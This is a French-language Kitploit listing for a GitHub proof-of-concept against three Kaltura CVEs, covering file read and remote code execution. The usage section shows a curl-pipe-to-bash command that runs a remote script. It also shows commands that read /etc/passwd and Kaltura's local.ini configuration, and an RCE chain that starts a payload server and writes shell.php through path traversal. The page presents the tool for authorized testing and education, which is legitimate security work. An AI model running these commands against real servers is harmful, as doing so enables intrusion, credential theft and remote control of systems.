Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-19912-CVE-2026-19913-CVE-2026-19914 — Preuves de concept pour CVE-2026-19912, CVE-2026-19913 et CVE-2026-19914, démontrant la lecture de fichiers et l'exécution de code à distance dans Kaltura, destinées aux tests de sécurité autorisés et à des fins pédagogiques. | Kitploit
Outils/GitHubGitHub/horkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubhorkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914

CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

Preuves de concept pour CVE-2026-19912, CVE-2026-19913 et CVE-2026-19914, démontrant la lecture de fichiers et l'exécution de code à distance dans Kaltura, destinées aux tests de sécurité autorisés et à des fins pédagogiques.

Voir le dépôt
il y a 8h 25mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

Faire un don

Aidez à maintenir ce projet

Si vous trouvez ce projet utile, merci de considérer un soutien à sa maintenance continue via PayPal ou ABA Mobile.

❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។

❤️ Dix pour cent de chaque don est reversé à l'hôpital pour enfants Kantha Bopha.

Choisissez un moyen de paiement

Faites un don en toute sécurité avec PayPal

Code QR de don ABA Mobile
Scannez avec ABA Mobile · Cliquez pour agrandir

⚡ Utilisation simple

Exécutez la dernière version du script de téléchargement externe directement depuis GitHub :

root@kitploit:~
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)

Cette commande nécessite Bash et curl. Examinez le script distant avant de l'exécuter si vous ne faites pas confiance à la source.

Utilisez ce projet uniquement dans des environnements sûrs et autorisés, tels que :

  • Machines virtuelles locales
  • Conteneurs Docker
  • Configurations de laboratoire isolées
  • Environnements de tests d'intrusion autorisés

Exemple de configuration :

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Le projet utilise Python, suivez les étapes ci-dessous

# Créez un environnement virtuel
python -m venv venv

# Activez l'environnement virtuel

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Installez les dépendances
pip install -r requirements.txt

Exemple d'utilisation :

root@kitploit:~
# 1. Lecture de fichier (la plus fiable, fonctionne comme décrit dans l'article)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
    -f /opt/kaltura/app/configurations/local.ini --try-versions

# 2. Serveur de payload uniquement (à utiliser avec Burp / curl manuellement)
python3 kaltura_poc.py serve --lport 8888

# 3. Squelette de chaîne complète
python3 kaltura_poc.py rce http://127.0.0.1 \
    --lhost 172.17.0.1 --lport 8888 \
    --payload stdclass \
    --shell '../../../../../../../../var/www/html/shell.php'

Crédit ou référence

  • https://anddone-git.github.io/2026/one-parameter-two-bugs/

📚 Référentiel de recherche pédagogique en sécurité

Un référentiel pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.


⚠️ Avertissement de sécurité et juridique

Objectif

Ce référentiel est destiné uniquement à la recherche en sécurité pédagogique et autorisée.

Il est conçu pour aider les utilisateurs à apprendre :

  • Les vulnérabilités de sécurité
  • Les concepts de sandbox et d'isolation
  • Les pratiques de codage sécurisé et de défense

Utilisation autorisée uniquement

Utilisez ce référentiel uniquement dans des environnements où vous avez l'autorisation, tels que :

  • Laboratoires personnels ou machines virtuelles
  • Environnements Docker ou isolés
  • Tests d'intrusion autorisés
  • Formation en cybersécurité ou recherche académique

Toute utilisation non autorisée ou illégale est strictement interdite.


Aucune responsabilité

L'auteur et les contributeurs ne sont pas responsables des dommages, mauvaises utilisations, problèmes juridiques ou pertes causés par ce projet.

En utilisant ce référentiel, vous acceptez que :

  • Vous êtes responsable de vos propres actions
  • Vous l'utiliserez de manière légale et éthique
  • Le projet est fourni sans garantie

Utilisation éthique

Ce projet est destiné à :

  • La recherche en sécurité défensive
  • L'éducation en cybersécurité
  • La sensibilisation aux vulnérabilités
  • La recherche sur les systèmes et logiciels sécurisés

Veuillez suivre les pratiques de divulgation responsable et vous conformer à toutes les lois applicables.


Contact

Pour une divulgation responsable ou une collaboration, contactez le mainteneur du référentiel via GitHub.


Projet connexe

Explorez la Collection de PoC CVE pour des ressources supplémentaires de preuves de concept CVE destinées à la recherche en sécurité autorisée et à l'éducation.

Télécharger l’outil